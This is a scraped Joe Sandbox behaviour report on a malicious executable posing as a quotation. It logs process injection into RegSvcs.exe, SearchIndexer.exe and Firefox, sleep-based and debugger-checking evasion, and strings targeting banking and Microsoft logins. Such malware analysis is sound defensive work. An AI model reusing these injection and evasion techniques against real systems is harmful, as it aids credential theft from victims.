Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\SearchIndexer.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\SearchIndexer.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\SearchIndexer.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\SearchIndexer.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\SearchIndexer.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\SearchIndexer.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\SearchIndexer.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\SearchIndexer.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory allocated: 2390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory allocated: 2590000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory allocated: 2390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory allocated: 82A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory allocated: 92A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory allocated: 9490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory allocated: A490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory allocated: AC30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory allocated: BC30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory allocated: CC30000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6311	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2303	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Window / User API: threadDelayed 3229	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Window / User API: threadDelayed 6743	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\SearchIndexer.exe	API coverage: 2.6 %

Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe TID: 720	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe TID: 7960	Thread sleep count: 3229 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe TID: 7960	Thread sleep time: -6458000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe TID: 7960	Thread sleep count: 6743 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe TID: 7960	Thread sleep time: -13486000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe TID: 8004	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe TID: 8004	Thread sleep count: 33 > 30	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe TID: 8004	Thread sleep time: -49500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe TID: 8004	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe TID: 8004	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\SearchIndexer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Last function: Thread delayed

Source: 1I-h6-n0M4.15.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 1I-h6-n0M4.15.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 1I-h6-n0M4.15.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 1I-h6-n0M4.15.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 1I-h6-n0M4.15.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 1I-h6-n0M4.15.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 1I-h6-n0M4.15.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 1I-h6-n0M4.15.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 1I-h6-n0M4.15.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 1I-h6-n0M4.15.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 1I-h6-n0M4.15.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 1I-h6-n0M4.15.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 1I-h6-n0M4.15.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 1I-h6-n0M4.15.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 1I-h6-n0M4.15.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 1I-h6-n0M4.15.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: firefox.exe, 00000014.00000002.2049930966.00000223429BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 1I-h6-n0M4.15.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: QUOTATION NO REQ-19-000640.exe, 00000000.00000002.1279802863.00000000006E2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 1I-h6-n0M4.15.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 1I-h6-n0M4.15.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 1I-h6-n0M4.15.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 1I-h6-n0M4.15.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 1I-h6-n0M4.15.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: SearchIndexer.exe, 0000000F.00000002.3742460427.00000000030EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
Source: 1I-h6-n0M4.15.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 1I-h6-n0M4.15.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 1I-h6-n0M4.15.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 1I-h6-n0M4.15.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 1I-h6-n0M4.15.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: KVNT56jRlfzS0OWcgx3s5.exe, 00000010.00000002.3747356119.00000000008B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
Source: 1I-h6-n0M4.15.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 1I-h6-n0M4.15.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 1I-h6-n0M4.15.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 1I-h6-n0M4.15.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtTerminateProcess: Direct from: 0x77762D5C	Jump to behavior
Source: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\SearchIndexer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: NULL target: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: NULL target: C:\Program Files (x86)\IcKxVbfhKxTpcPLOabzVARZdkkNjnXvuxsQCjKAKfGjhau\KVNT56jRlfzS0OWcgx3s5.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1172008	Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report QUOTATION NO REQ-19-000640.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
QUOTATION NO REQ-19-000640.exe

Source: KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000002.3748566485.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000000.1665681843.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 00000010.00000000.1820443653.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000002.3748566485.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000000.1665681843.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 00000010.00000000.1820443653.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000002.3748566485.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000000.1665681843.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 00000010.00000000.1820443653.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000002.3748566485.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 0000000D.00000000.1665681843.0000000000D60000.00000002.00000001.00040000.00000000.sdmp, KVNT56jRlfzS0OWcgx3s5.exe, 00000010.00000000.1820443653.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Queries volume information: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION NO REQ-19-000640.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
